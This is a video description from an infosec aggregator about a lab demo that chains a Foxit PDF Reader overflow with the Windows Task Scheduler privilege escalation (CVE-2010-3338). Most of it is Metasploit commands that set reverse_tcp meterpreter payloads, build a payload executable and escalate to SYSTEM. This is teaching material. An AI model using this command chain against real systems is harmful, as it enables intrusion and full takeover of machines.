Description: Timeline :
webDEViL 0day release on Exploit-DB the 2010-11-20
Metasploit exploit released the 2010-11-20
Provided by:
webDEViL
jduck
References :
EDB-ID-15589
MS10-092
CVE-2010-3338
Affected versions :
Should work on Vista/Win7/2008 x86/x64
Tested on Windows 7 Integral
Description:
We will give you a demo of the brand new Microsoft 0day called "Windows Task Scheduler Privilege Escalation 0day" aka EDB-ID-15589 on Exploit-DB. This 0day is still not patched.
To demonstrate a real privilege escalation we will first exploit the Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow from corelan. The user how will open the PDF file is a Windows 7 Standard User. After getting access to the Standard User session, we will escalate our privileges to NT System Authority user, to gain a complete control of the box.
Take care the actual Metasploit provided meterpreter script has still some bugs and will not work if you have a non english language operating system. Metasploit Team is working on the bugs.
Metasploit demo :
Foxit PDF Reader exploitation
use exploit/windows/fileformat/foxit_title_bof
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sysinfo
getuid
getprivs
Creating a test.exe containing a reverse_tcp meterpreter payload
sudo msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.178.21 X test.exe
Lunching a second multi handler listener with msfcli
sudo msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.178.21 E
Running schelevator to gain system privileges
run schelevator -u test.exe
getuid
getprivs
Owned
Tags: metasploit , windows , seven , 0day , exploit , scheduler , escalation , privilege ,
Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.